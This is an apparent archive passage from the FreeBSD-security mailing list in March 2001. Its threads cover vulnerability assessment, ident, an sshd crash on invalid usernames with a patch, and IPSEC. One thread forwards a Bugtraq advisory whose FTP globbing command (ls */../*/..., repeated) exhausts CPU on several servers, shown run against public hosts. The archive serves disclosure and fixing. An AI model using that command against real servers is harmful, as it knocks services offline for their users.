freebsd-security@freebsd.org Subject: Re: What's vunerable? Message-ID: <20010316121158.A17693@daphne.unloved.org> Mail-Followup-To: Ashley Penney , freebsd-security@freebsd.org References: <3AB1DBF9.C721E3D6@vianetworks.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 09:25:13AM +0000, Peter McGarvey said: > I've just inherited several FreeBSD boxes. The versions range from > 3.2_RELEASE to 4.1_RELEASE. > > On the BSD boxes I already maintain I cvsup and make world on a monthly > basis - or as soon as I see a CERT advisory that I know relates to > something that can bite. But the inherited boxes need a lot of work, > and I cannot guarantee to "The Powers That Be" that a make world wont > break the box. > > What I really need to know is what vulnerabilities exist on each box - > so that I can present the boss with a risk assessment, and make him > decide if the box stays as is, or gets a make world. > > So any advice anyone can give me, on how to find out what's vunerable > with any particular FreeBSD version, would be greatly appreciated. One suggestion I would have is to pop to www.nessus.org, and use the scanner they provide. It can output reports in HTML and so forth, with pretty graphics for PHB's. However, it can sometimes trigger false alarms so I'd run it against the boxes, and check the results by hand. [I've found this very useful when I suddenly get thrown into 500 boxes, all running different versions of OS's.] -- "I think our users are a lazy bunch of elitist snobs when it comes to advocacy." -- Poul-Henning Kemp on the FreeBSD community. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 4:45: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id DCC9037B718 for ; Fri, 16 Mar 2001 04:44:57 -0800 (PST) (envelope-from roam@orbitel.bg) Received: (qmail 22337 invoked by uid 1000); 16 Mar 2001 12:44:17 -0000 Date: Fri, 16 Mar 2001 14:44:17 +0200 From: Peter Pentchev To: Shoichi Sakane Cc: kris@obsecurity.org, freebsd-security@FreeBSD.ORG Subject: Re: What's vunerable? Message-ID: <20010316144417.A22302@ringworld.oblivion.bg> Mail-Followup-To: Shoichi Sakane , kris@obsecurity.org, freebsd-security@FreeBSD.ORG References: <20010316014004.A86953@mollari.cthul.hu> <20010316192556Q.sakane@ydc.co.jp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010316192556Q.sakane@ydc.co.jp>; from sakane@ydc.co.jp on Fri, Mar 16, 2001 at 07:25:56PM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 07:25:56PM +0900, Shoichi Sakane wrote: > > > What I really need to know is what vulnerabilities exist on each box - > > > so that I can present the boss with a risk assessment, and make him > > > decide if the box stays as is, or gets a make world. > > > Read the advisories. > > why don't the maintener of the ports of openssh make upgrade its version ? > current version of the ports is openssh 2.2.0 which has some vulnerability. The version of OpenSSH in the ports tree is not plain 2.2.0, but 2.2.0 'port revision' 2. The 'port revision' was bumped twice to indicate important security fixes. The 'some vulnerability' you are referring to is probably the Bleichenbacher attack, which affected nearly all SSH servers at the time; a fix was prompty added to the FreeBSD port. G'luck, Peter -- If I had finished this sentence, To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 4:51:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id CE84137B718 for ; Fri, 16 Mar 2001 04:51:21 -0800 (PST) (envelope-from roam@orbitel.bg) Received: (qmail 22441 invoked by uid 1000); 16 Mar 2001 12:50:39 -0000 Date: Fri, 16 Mar 2001 14:50:39 +0200 From: Peter Pentchev To: Lukasz Pawlik Cc: freebsd-security@freebsd.org Subject: Re: Invalid hostname Message-ID: <20010316145039.B22302@ringworld.oblivion.bg> Mail-Followup-To: Lukasz Pawlik , freebsd-security@freebsd.org References: <20010316103954.A24855@btk.za.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010316103954.A24855@btk.za.net>; from freebsd@btk.za.net on Fri, Mar 16, 2001 at 10:39:54AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 10:39:54AM +0000, Lukasz Pawlik wrote: > Hello, > I'd like to ask for a little help. I dont understand one record > which is printed by last. > ash ttyp2 invalid hostname Ndz 11 Mar 19:07 - 20:13 (01:06) > > What the 'invalid hostname' is? If DNS failed, why there is no ip? > Can someone explain me? > Lukasz 'invalid hostname' is what /usr/bin/login puts into the wtmp record, when it (login) is started with an '-h hostname' argument, and then the DNS lookup of the specified hostname fails. Thus, login cannot put an IP address there, 'cause it's just the IP address lookup that failed :) The fun question is how did login get started with an invalid hostname passed; how did the user in question log in to the machine? Apparently it was over the network, was it a telnet, SSH or some other kind of session? G'luck, Peter -- If there were no counterfactuals, this sentence would not have been paradoxical. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 5:13: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.interchange.ca (ns.interchange.ca [216.126.79.2]) by hub.freebsd.org (Postfix) with ESMTP id 0019437B718 for ; Fri, 16 Mar 2001 05:13:06 -0800 (PST) (envelope-from michael@fastmail.ca) Received: by mail.interchange.ca (Fastmailer, from userid 555) id 1B68120AE; Fri, 16 Mar 2001 08:12:33 -0500 (EST) MIME-Version: 1.0 Message-Id: <3AB21141.0000E1.28395@frodo.searchcanada.ca> Content-Type: Multipart/Mixed; boundary="------------Boundary-00=_XOKA015BHVCNTT4D7TH0" To: freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service Cc: bright@wintelcom.net From: "Michael Richards" X-Fastmail-IP: 24.43.130.237 Date: Fri, 16 Mar 2001 08:12:33 -0500 (EST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------Boundary-00=_XOKA015BHVCNTT4D7TH0 Content-Type: Text/Plain Content-Transfer-Encoding: 7bit Normally when I write code to sanatise a user entered path with glob or .. in it I process the string to remove any directory name succeeded by a '/..' There is of course a problem with this generalised optimisation. /nonexistant/../existant/ succeeds where it shouldn't. However, when you apply it to a glob, it is implied that '*/..' must exist. In this case, I believe it is valid to remove any iteration of '*/..' from the string. This may still, however leave a crafty combination of '?' to cause the same problem. -Michael >> Actually I think this highly depends on HOW MANY files and >> directories FTPD can access. >> >> I didn't see any damage with a jailed FTPD with 1 directoy and 2 >> files. > > The only reason you didn't see a problem was because you had > only one directory. > > The DoS works via a simple mechanism. > > if you have a dir with two directories in it 'a' and 'b' > > */../ -> a/.. b/.. > */../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/.. > > basically for each ../*/ you do a power N where N is the number > of directories. _________________________________________________________________ http://fastmail.ca/ - Fast Free Web Email for Canadians --------------Boundary-00=_XOKA015BHVCNTT4D7TH0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 5:52:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id 8A08037B718 for ; Fri, 16 Mar 2001 05:52:37 -0800 (PST) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id PAA16561 for ; Fri, 16 Mar 2001 15:02:57 GMT Message-Id: <200103161502.PAA16561@mailgate.kechara.net> Date: Fri, 16 Mar 2001 13:56:08 -0000 To: freebsd-security@freebsd.org From: Lee Smallbone Subject: Re: Multiple vendors FTP denial of service (fwd) Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 4.2-RELEASE, regular user, regular home directory (snipped) /../www/62.49.139.3_3-year.png www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/62.49.139.3_3.html www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/btareshit.png www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/62.49.139.3_3.old 226 Transfer complete. ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec. ftp> 15/03/2001 22:21:16, Attila Nagy wrote: >FreeBSD isn't listed, but also vulnerable, at least with the FTPd in >-STABLE. > >---------- Forwarded message ---------- >Date: Thu, 15 Mar 2001 09:34:09 +0100 >From: "Frank DENIS (Jedi/Sector One)" >To: BUGTRAQ@SECURITYFOCUS.COM >Subject: Multiple vendors FTP denial of service > >- Proftpd built-in 'ls' command has a globbing bug that allows remote >denial-of-service. > > Here's a simple exploit, tested on the Proftpd site : > >$ ftp ftp.proftpd.org >... >Name (ftp.proftpd.org:j): ftp >... >230 Anonymous access granted, restrictions apply. >Remote system type is UNIX. >Using binary mode to transfer files. >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >227 Entering Passive Mode (216,10,40,219,4,111). >421 Service not available, remote server timed out. Connection closed > > That command takes 100% CPU time on the server. It can lead into an easy >DOS even if few remote simultanous connections are allowed. > > Other FTP servers may be concerned as well. Here are various tries : > >- NetBSD FTP showed the same behavior than Proftpd : > >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >200 EPRT command successful. >(long delay) >421 Service not available, remote server timed out. Connection closed > >So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a >possible DOS. Other BSD FTP may be affected as well. > >- Microsoft FTP Service (Version 5.0) seems also confused by the command : >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >500 'EPSV': command not understood >227 Entering Passive Mode (207,46,133,140,4,223). >200 PORT command successful. >150 Opening ASCII mode data connection for file list. >(very long delay... nothing happens...) > >- Publicfile refuses the command : > >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >227 =131,193,178,181,97,222 >550 Sorry, I can't open that file: file does not exist. > >- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and >displayed. > >- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard >expression to *" and the 'ls *' output. > > > Maintainers of vulnerable servers have been warned of this bug. > >-- > -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=- > LINAGORA SA (Paris, France) : http://www.linagora.com > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 5:59:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id A88D437B719 for ; Fri, 16 Mar 2001 05:59:20 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f2GDxH111551; Fri, 16 Mar 2001 14:59:17 +0100 (CET) (envelope-from phk@critter.freebsd.dk) To: lee@kechara.net Cc: freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service (fwd) In-Reply-To: Your message of "Fri, 16 Mar 2001 13:56:08 GMT." <200103161502.PAA16561@mailgate.kechara.net> Date: Fri, 16 Mar 2001 14:59:17 +0100 Message-ID: <11549.984751157@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200103161502.PAA16561@mailgate.kechara.net>, Lee Smallbone writes: >4.2-RELEASE, regular user, regular home directory > >(snipped) > >/../www/62.49.139.3_3-year.png >www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www >/../www/62.49.139.3_3.html >www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www >/../www/btareshit.png >www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www >/../www/62.49.139.3_3.old >226 Transfer complete. >ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec. >ftp> Now, try to create a 'foo' directory next to your 'www' directory... -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 6:31: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from gyw.com (gyw.com [209.55.67.177]) by hub.freebsd.org (Postfix) with ESMTP id 90AEE37B719 for ; Fri, 16 Mar 2001 06:30:59 -0800 (PST) (envelope-from tjk@tksoft.com) Received: from smtp3.tksoft.com (smtp3.tksoft.com [192.168.50.56] (may be forged)) by gyw.com (8.8.8/8.8.8) with ESMTP id GAA26051; Fri, 16 Mar 2001 06:47:31 -0800 Received: (from tjk@tksoft.com) by smtp3.tksoft.com (8.8.8/8.8.8) id GAA17664; Fri, 16 Mar 2001 06:17:49 -0800 From: "tjk@tksoft.com" Message-Id: <200103161417.GAA17664@smtp3.tksoft.com> Subject: Re: Multiple vendors FTP denial of service (fwd) To: bright@wintelcom.net (Alfred Perlstein) Date: Fri, 16 Mar 2001 06:17:48 -0800 (PST) Cc: apina@infolink.com.br (Antonio Carlos Pina), freebsd-security@FreeBSD.ORG In-Reply-To: <20010315155234.G29888@fw.wintelcom.net> from "Alfred Perlstein" at Mar 15, 2001 03:52:34 PM X-Info: None MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One solution I can think of is to use a hash table for interpreting the glob results, and count duplicate listings of directories/files. Then truncate the results if the duplicates exceed x times valid keys in the hash (or report an error, or both.) I don't know if there is a set of hash routines available, but if not, one could use a tree (tsearch) to accomplish the same. All this depends on the file listings being first converted to the shortest path to the file. I.e. "/etc/../etc/yadayada.txt" would become "/etc/yadayada.txt" before being added to the list. I presume this is already done. The other solution is to always reduce the original path to its shortest form, to avoid recursive listings of directories. Sounds a simpler and faster approach. If only someone's got foolproof logic to accomplish this. Removing certain strings might work. Sounds like frustrating extra work, but since there is a problem, what else are you going to do? Troy > > * Antonio Carlos Pina [010315 15:17] wrote: > > Hello, > > > > Actually I think this highly depends on HOW MANY files and > > directories FTPD can access. > > > > I didn't see any damage with a jailed FTPD with 1 directoy and 2 > > files. > > The only reason you didn't see a problem was because you had > only one directory. > > The DoS works via a simple mechanism. > > if you have a dir with two directories in it 'a' and 'b' > > */../ -> a/.. b/.. > */../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/.. > > basically for each ../*/ you do a power N where N is the number > of directories. > > How could this be fixed? I think it's somewhat simple, > have glob() maintain a truncated version of paths and > make sure that any collisions are detected. > > Of course this is only speculation since I haven't looked > at the code. > > -- > -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 8:39:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from mars.entic.net (mars.entic.net [63.125.62.132]) by hub.freebsd.org (Postfix) with ESMTP id 0B09637B718 for ; Fri, 16 Mar 2001 08:39:11 -0800 (PST) (envelope-from aj@entic.net) Received: (qmail 18072 invoked by uid 100); 16 Mar 2001 16:39:07 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 16 Mar 2001 16:39:07 -0000 Date: Fri, 16 Mar 2001 08:39:07 -0800 (PST) From: Anil Jangity To: Subject: Re: Multiple vendors FTP denial of service In-Reply-To: <20010315215913.A70990@mollari.cthul.hu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris/All, FTPD is run as root (atleast on my machine). I don't want to limit root resources, since I am not sure exactly what a good ball park figure for root would be... I looked in ftpd(8) for some way to make it run as another user (atleast after it starts up) but no luck. So, my question is, how do you propose we resource limit ftpd as you suggest via login.conf? Thanks Anil @ I'm pretty sure (but haven't tested) that resource limits will prevent @ this problem. Your ftpd shouldn't be using large amount of memory @ under normal operating procedures, so you can set those to reasonable @ values and not suffer any ill effects. @ @ Kris @ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 8:46:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170]) by hub.freebsd.org (Postfix) with ESMTP id 8A91A37B719 for ; Fri, 16 Mar 2001 08:46:46 -0800 (PST) (envelope-from mit@mitayai.net) Received: (from root@localhost) by castle.dreaming.org (8.11.3/8.11.2) id f2GGkeu37698; Fri, 16 Mar 2001 11:46:40 -0500 (EST) (envelope-from mit@mitayai.net) Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.3/8.11.2av) with SMTP id f2GGkca37690; Fri, 16 Mar 2001 11:46:38 -0500 (EST) (envelope-from mit@mitayai.net) From: "Will Mitayai Keeso Rowe" To: "Peter McGarvey" , "freebsd-security" Subject: RE: What's vunerable? Date: Fri, 16 Mar 2001 11:43:40 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org inherited? need a lot of work? then assume everything is vulnerable due to ex-employees, past trojan horses, bad administrative practices and configurations, etc. go through the FreeBSD Security Advisories at http://www.freebsd.org/security/#adv for alkl the listed advisories. make sure you pay attention to all the installed packages, ports, and user-installed third-party stuff. -Mit :-----Original Message----- :From: owner-freebsd-security@FreeBSD.ORG :[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter McGarvey :Sent: March 16, 2001 04:25 AM :To: freebsd-security :Subject: What's vunerable? : : :I've just inherited several FreeBSD boxes. The versions range from :3.2_RELEASE to 4.1_RELEASE. : :On the BSD boxes I already maintain I cvsup and make world on a monthly :basis - or as soon as I see a CERT advisory that I know relates to :something that can bite. But the inherited boxes need a lot of work, :and I cannot guarantee to "The Powers That Be" that a make world wont :break the box. : :What I really need to know is what vulnerabilities exist on each box - :so that I can present the boss with a risk assessment, and make him :decide if the box stays as is, or gets a make world. : :So any advice anyone can give me, on how to find out what's vunerable :with any particular FreeBSD version, would be greatly appreciated. : :-- :TTFN, FNORD : :Peter McGarvey :System Administrator :Network Operations, VIA Networks UK : :To Unsubscribe: send mail to majordomo@FreeBSD.org :with "unsubscribe freebsd-security" in the body of the message : : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 8:54:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 4996537B718 for ; Fri, 16 Mar 2001 08:54:42 -0800 (PST) (envelope-from wes@softweyr.com) Received: from [127.0.0.1] (helo=softweyr.com ident=4a656828bf96df23684bddfc4d0922ae) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14dxS9-0000Ko-00; Fri, 16 Mar 2001 09:51:50 -0700 Message-ID: <3AB244A5.315DFD16@softweyr.com> Date: Fri, 16 Mar 2001 09:51:49 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Nate Williams Cc: Adam Laurie , Ronan Lucio , security@FreeBSD.ORG Subject: Re: Port 113 References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams wrote: > > > > > Could anybody say me when I need to allow the port 113 > > > > in the firewall? > > > > > > *Need* form auth is a strong word. However, it does tend to speed up > > > email transfers is you enable a version that always responds true. > > > > > > So, any external SMTP servers you have *should* have this port enabled. > > > > > > > What services use this port? > > > > > > I know that SMTP uses it, and I believe that ftpd uses it, and I believe > > > irc also uses it. > > > > smtp does not need to use it - you can achieve the same speedy transfers > > by telling your smtp server not to bother. e.g. for sendmail: > > > > O Timeout.ident=0s > > My local sendmail doesn't use *my* ident server, but remote sendmail > servers use *my* ident server, so using ident locally speeds up mail > transfers *to* my host. > > I certainly don't use ident for local email. :) To quote a relatively unknown identd server, "Fools trust ident!" -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 9:57: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from silver.teardrop.org (silver.teardrop.org [205.181.101.128]) by hub.freebsd.org (Postfix) with ESMTP id 8368837B71D for ; Fri, 16 Mar 2001 09:57:00 -0800 (PST) (envelope-from snow@teardrop.org) Received: (from snow@localhost) by silver.teardrop.org (8.11.2/8.11.1) id f2GHtWC66126; Fri, 16 Mar 2001 12:55:33 -0500 (EST) (envelope-from snow@teardrop.org) Date: Fri, 16 Mar 2001 12:55:32 -0500 From: James Snow To: Kris Kennaway Cc: Brooks Davis , Alex Popa , security@FreeBSD.ORG Subject: Re: 4.3-BETA, sshd.core found in root directory. Message-ID: <20010316125532.A65814@teardrop.org> References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010312152215.A94640@mollari.cthul.hu>; from kris@obsecurity.org on Mon, Mar 12, 2001 at 03:22:15PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Mar 12, 2001 at 03:22:15PM -0800, Kris Kennaway wrote: > On Mon, Mar 12, 2001 at 02:57:54PM -0800, Brooks Davis wrote: > > On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote: > > > I am not really sure what this means (could mean a lot of things, > > > including bad memory on my machine), but here are the facts: > > > > This reminds me of something I noticed during the last discussion of > > ssh I got involved in and compleatly forgot about. If you create an > > account with a bad shell (say, /bin/false) and run the following command > > you get an immediate sshd core dump: > > > > ssh -t xxx@localhost /bin/sh > > > > Attempting to run gdb on the core appears to show that I'm in: > > > > #0 0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3 > > > > but the binary is stripped so I don't know and my /usr/obj is out of > > sync with my world at the moment so I figure running gdb against the > > unstripped binary is not productive. > > There's a PR open about this and Brian is looking into it - > indications are it's a simple bug and not a security problem, denial > of service or otherwise. I don't know whether or not it's exploitable, but I just ran up against this myself today. You can reproduce it by using ssh version 2 and giving sshd an invalid username. The problematic code is in src/crypto/openssh/auth2.c in input_userauth_request: 208 pw = getpwnam(user); 209 if (pw && allowed_user(pw) && strcmp(service, "ssh-connection")==0) { 210 authctxt->pw = pwcopy(pw); 211 authctxt->valid = 1; 212 debug2("input_userauth_request: setting up authctxt for %s", user); 213 #ifdef USE_PAM 214 start_pam(pw); 215 #endif 216 } else { 217 log("input_userauth_request: illegal user %s", user); 218 } If you supply an invalid username, this line: 208 pw = getpwnam(user); will set pw to null. The if statement at line 209: 209 if (pw && ... will fail immediately because pw is null, and the code skips to: 216 } else { 217 log("input_userauth_request: ... 218 } Things fall down and go boom here: 231 if (authctxt->pw != NULL) { 232 lc = login_getpwclass(authctxt->pw); authctxt->pw never gets set to anything unless you enter the if, which we don't because of the pw pointer being null. So it points off into space, and login_getpwclass will cause a SIGSEGV when it tries to deference it. My fix for this was to stick a 'authctxt->pw = NULL;' in the else block: 216 } else { 217 log("input_userauth_request: ... 218 authctxt->pw = NULL; 219 } Then you get this: input_userauth_request: illegal user nonexistant Failed password for NOUSER from 198.76.121.128 port 3150 ssh2 instead of this: input_userauth_request: illegal user nonexistant Segmentation fault (core dumped) I don't think this fix is ideal, as I think the log entry should continue to show the username the client tried to login with and not 'NOUSER,' but it will certainly close the hole, if indeed it is one. At least I'll sleep better tonight. I wasn't able to reproduce this under Linux and it doesn't occur using ssh1. Also, is anyone going to fix the pipe bug in sshd that causes all those annoying "Broken pipe" errors? I know there's a patch out there for it. -Snow To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 9:58: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from peace.mahoroba.org (peace.calm.imasy.or.jp [202.227.26.34]) by hub.freebsd.org (Postfix) with ESMTP id 8CB3237B719 for ; Fri, 16 Mar 2001 09:57:58 -0800 (PST) (envelope-from ume@FreeBSD.org) Received: from localhost (IDENT:WR7wH86hkIS8CelPaXz3tP2/ovMRPW3y3dykVc1g8qX7AIRgsIQKw4zDFsROLHAt@localhost [::1]) (authenticated as ume with CRAM-MD5) by peace.mahoroba.org (8.11.3/8.11.3/peace) with ESMTP/inet6 id f2GHs2R54078; Sat, 17 Mar 2001 02:54:03 +0900 (JST) (envelope-from ume@FreeBSD.org) Date: Sat, 17 Mar 2001 02:53:58 +0900 (JST) Message-Id: <20010317.025358.74704976.ume@FreeBSD.org> To: itojun@iijlab.net Cc: jomor@ahpcns.com, mburgett@awen.com, freebsd-security@FreeBSD.ORG Subject: Re: IPSEC tunnel without gif? From: Hajimu UMEMOTO In-Reply-To: <19427.984720576@coconut.itojun.org> References: <3AB18AAC.9069CBF2@ahpcns.com> <19427.984720576@coconut.itojun.org> X-Mailer: xcite1.38> Mew version 1.95b97 on Emacs 20.7 / Mule 4.0 =?iso-2022-jp?B?KBskQjJWMWMbKEIp?= X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91 05 D0 B3 EF 36 9B 6A BC X-URL: http://www.imasy.org/~ume/ X-OS: FreeBSD 5.0-CURRENT Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> On Fri, 16 Mar 2001 14:29:36 +0900 >>>>> itojun@iijlab.net said: >> >The gateway that received the pings was transmitting ARP >> >requests but strangely, it was trying to get the hardware >> >address of the other tunnel endpoint rather than that of >> >the router in the middle. Since the ARP requests were never >> >answered, the ping response was never transmitted. itojun> so you are seeing ARP for tunnel inner addresses? itojun> http://www.kame.net/dev/cvsweb.cgi/kame/kame/sys/netinet6/ipsec.c.diff?r1=1.84&r2=1.85 itojun> should fix the above issue. not sure about freebsd merge status. Since it seems no feedback from the originator of KAME PR 233, I had been suspended to merge it from KAME. I just committed it. http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet6/ipsec.c.diff?r1=1.9&r2=1.10 -- Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org http://www.imasy.org/~ume/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 9:59:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail-100baset.rpi.edu [128.113.26.45]) by hub.freebsd.org (Postfix) with ESMTP id 0B15437B71C for ; Fri, 16 Mar 2001 09:59:38 -0800 (PST) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id MAA91764; Fri, 16 Mar 2001 12:59:35 -0500 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk> References: <3AB1DBF9.C721E3D6@vianetworks.co.uk> Date: Fri, 16 Mar 2001 12:59:34 -0500 To: Peter McGarvey , freebsd-security From: Garance A Drosihn Subject: Re: 